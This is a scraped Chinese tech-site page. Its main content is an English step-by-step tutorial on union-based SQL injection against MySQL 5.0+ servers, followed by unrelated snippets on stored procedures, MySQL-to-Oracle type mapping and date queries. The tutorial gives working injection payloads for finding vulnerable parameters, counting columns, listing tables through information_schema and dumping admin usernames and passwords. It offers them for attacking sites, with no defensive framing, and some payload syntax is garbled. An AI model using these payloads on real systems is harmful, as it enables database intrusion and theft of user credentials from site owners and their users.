易截截图软件、单文件、免安装、纯绿色、仅160KB

[Injection]对MYSQL 5.0服务器以上版本注入


by ZaraByte
How to do a SQL Injection for MYSQL Server 5.0+
1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error
2. order by #–
Keep upping the # until you get an error.
3. union all select 1,#,#,#,#,#–
Above 6 numbers if the site you have shows more then 6 or less then since you need to add or remove them
4. Find a column # that is showed from step 2 example if there are 5 columns shown you can pick column 2
5. concat_ws(0×3A,version(),@@version) in vulnerable column
add concat_ws(0×3A,version(),@@version) to a vulnerable column like column 2 see if it shows the SQL version if it don’t try adding a – before the php?id=-# and see if you get the version
Will show the version of the SQL Server recommended that it be 5.0
6. union all select 1,group_concat(table_name),#,#,#,# from information_schema.tables where table_schema=database()–
This selects all the the tables from the database.
7. Find a table your after like admin or like users or user whatever table you wanna see
8. union all select 1,group_concat(column_name),#,#,#,# from information_schema.columns where table_name=char(x)–
Replace x with the ASCII of table name You will need to convert Text to ASCII.
9. union all select 1,group_concat(table_name,0×3a,table_name)#,#,#,# from column_name–
Replace table_name with the table name your after the 0×3a is hex for “:” table_name would be replaced with the other table name yours after
so for example say you found a table named admin and you wanna see the username and password columns you’d do
union all select 1,group_concat(username,0×3a,password,0×3c62723e)#,#,#,# from table_name–
Basically its going to show the username 0×3a is hex for “:” then the password 0×3c62723e is hex for a “< br >” which breaks them


相关文档:

mysql存贮过程

## **********first test,procedure**********
#<1>
use testprocedure;
delimiter //
create procedure simpleproce1 (out par1 int)
begin
 select count(*) into par1 from proce;
end
//
delimiter ;
call simpleproce1(@a);
select @a;
#<2>,每次只有单一的行可以被取回select id,name i ......

MySQL与Oracle数据类型转换


MySQL Data Type
Oracle Data Type
BIGINT
NUMBER(19, 0)
BIT
RAW
BLOB
BLOB, RAW
CHAR
CHAR
DATE
DATE
DATETIME
DATE
DECIMAL
FLOAT (24)
DOUBLE
FLOAT (24)
DOUBLE PRECISION
FLOAT (24)
ENUM
VARCHAR2
FLOAT
FLOAT
INT
NUMBER(10, 0)
INTEGER
NUMBER(10, 0)
LONGBLOB
BLOB, RAW
LONGTEX ......

MySql 按时间段查询数据方法


格式为2008-06-16
查询出当天数据:
SELECT * from `table` WHERE date(时间字段) = curdate();
查询出当月字段:
SELECT *
from `table`
WHERE month( 时间字段) = month( now( ) ) ;
时间格式为1219876…… UNIX时间,只要应用“from_UNIXTIME( )”函数
例如查询当月:
SELECT ......

mysql 5.0总结偷得


mysql 5.0存储过程学习总结
一.创建存储过程
1.基本语法:
create procedure sp_name()
begin
………
end
2.参数传递
二.调用存储过程
1.基本语法:call sp_name()
注意:存储过程名称后面必须加括号,哪怕该存储过程没有参数传递
三.删除存储过程
1.基本语法:
drop procedure sp_name// ......
© 2009 ej38.com All Rights Reserved. 关于E健网联系我们 | 站点地图 | 赣ICP备09004571号